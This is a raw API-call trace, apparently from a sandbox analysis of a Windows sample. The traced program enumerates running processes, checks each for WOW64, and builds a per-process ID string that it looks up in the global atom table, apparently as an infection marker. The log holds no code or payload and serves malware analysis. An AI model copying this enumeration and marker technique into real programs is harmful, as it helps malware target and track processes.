	[0133.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.699] CloseHandle (hObject=0x2dc) returned 1
	[0133.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.699] CloseHandle (hObject=0x2dc) returned 1
	[0133.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.700] CloseHandle (hObject=0x2dc) returned 1
	[0133.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.700] CloseHandle (hObject=0x2dc) returned 1
	[0133.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.701] CloseHandle (hObject=0x2dc) returned 1
	[0133.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.702] CloseHandle (hObject=0x2dc) returned 1
	[0133.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.703] CloseHandle (hObject=0x2dc) returned 1
	[0133.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.703] CloseHandle (hObject=0x2dc) returned 1
	[0133.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.703] CloseHandle (hObject=0x2dc) returned 1
	[0133.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.705] CloseHandle (hObject=0x2dc) returned 1
	[0133.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.705] CloseHandle (hObject=0x2dc) returned 1
	[0133.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.705] CloseHandle (hObject=0x2dc) returned 1
	[0133.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.706] CloseHandle (hObject=0x2dc) returned 1
	[0133.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.706] CloseHandle (hObject=0x2dc) returned 1
	[0133.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.708] CloseHandle (hObject=0x2dc) returned 1
	[0133.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.709] CloseHandle (hObject=0x2dc) returned 1
	[0133.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.709] CloseHandle (hObject=0x2dc) returned 1
	[0133.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.709] CloseHandle (hObject=0x2dc) returned 1
	[0133.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.710] GetLastError () returned 0x5
	[0133.710] GetLastError () returned 0x5
	[0133.710] GetLastError () returned 0x5
	[0133.710] GetLastError () returned 0x5
	[0133.710] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.715] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.716] GetLastError () returned 0x5
	[0133.717] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.717] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.717] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.717] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.718] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.719] GetLastError () returned 0x5
	[0133.720] GetLastError () returned 0x5
	[0133.720] GetLastError () returned 0x5
	[0133.720] GetLastError () returned 0x5
	[0133.720] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.720] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.720] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.720] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.720] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.720] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.721] CloseHandle (hObject=0x2dc) returned 1
	[0133.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.721] CloseHandle (hObject=0x2dc) returned 1
	[0133.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.721] CloseHandle (hObject=0x2dc) returned 1
	[0133.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.722] CloseHandle (hObject=0x2dc) returned 1
	[0133.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.722] CloseHandle (hObject=0x2dc) returned 1
	[0133.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.723] CloseHandle (hObject=0x2dc) returned 1
	[0133.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.759] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.759] CloseHandle (hObject=0x2dc) returned 1
	[0133.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.760] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.760] CloseHandle (hObject=0x2dc) returned 1
	[0133.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.760] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.760] CloseHandle (hObject=0x2dc) returned 1
	[0133.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.761] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.761] CloseHandle (hObject=0x2dc) returned 1
	[0133.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.761] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.761] CloseHandle (hObject=0x2dc) returned 1
	[0133.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.762] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
